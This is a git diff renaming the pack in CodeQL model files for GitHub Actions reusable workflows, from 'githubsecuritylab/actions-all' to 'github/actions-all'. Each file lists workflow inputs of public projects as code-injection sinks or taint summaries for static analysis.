extensible: actionsSinkModel data: - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index 34e41e9c589..b6c0c1b5e64 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index cc38156973b..005db8e9ddc 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index 748287e75f8..a1090c45ae0 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 703a138d28d..051aacfeee0 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 97f1bafd1f3..1fb380a3a72 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index 064c946363f..a8b8234e1fc 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 4a5c66bc744..108bbad1c07 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index a1e4b624b45..42ed67f3d20 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index 888aed947da..a664d6063e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index 3b5f69e9342..6270ab5842e 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml index 8e28b46f2c7..0c4d975e012 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 7f63b48ed84..64fc3792659 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index e7e42031e04..f48be6693d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index 0c34609ccef..f2ebae0b0ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index 82de946e406..ec591db22ac 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 09c4c2a83c3..06fdea3f8a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index 0e4571fc728..b864551b3fb 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index 6a03acfb11d..fdb499a81dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index f41ee1211d3..c831a5d6d8f 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index 8a64c0ce5f1..d9d4e9bd2fa 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index 18e66bf7291..4091c74dee5 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 1ed7561a533..1c6d8804d6d 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index 738fde2cb86..f94c87537cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index c61a63f1144..efb8e467a0a 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index fef036f4f29..8a7b36e365c 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index b13ba8bc40f..0d6fb59ed50 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index 3fb2fefff6b..74bdb5ab280 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 4344e254be0..038fd953d6e 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index 2a7c5feafea..0c185f4cbd5 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 9ccb41c3a8c..44e89b4e251 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index b71e6c001d0..6b4feeedf62 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index ff0695c0ef2..43e99341717 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index 9576ce3892a..cc5fb5c8d57 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index b78d6118411..64ca7805d90 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index cbe56806056..eab60f25238 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index 391bbc6aacb..fc91813e01b 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index f8b490726da..253c82f4bef 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index 889499eea3d..eb1b3df774d 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 2dce19050ed..3c6e1aaf658 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] @@ -10,7 +10,7 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml index c80f8e732b6..3f66f287830 100644 --- a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index b85a11d81f2..b45eabdf202 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index f8102400cc7..76bb69800a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 1af7b832203..9af37394143 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index c0688a4a5e0..9d0113eb8ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 4e91308a004..90ad3c0f9a1 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index bc42c619599..e07d783ae53 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index 68925b294bb..3d698b0a84b 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index c3ff42ed604..364bd19139e 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml 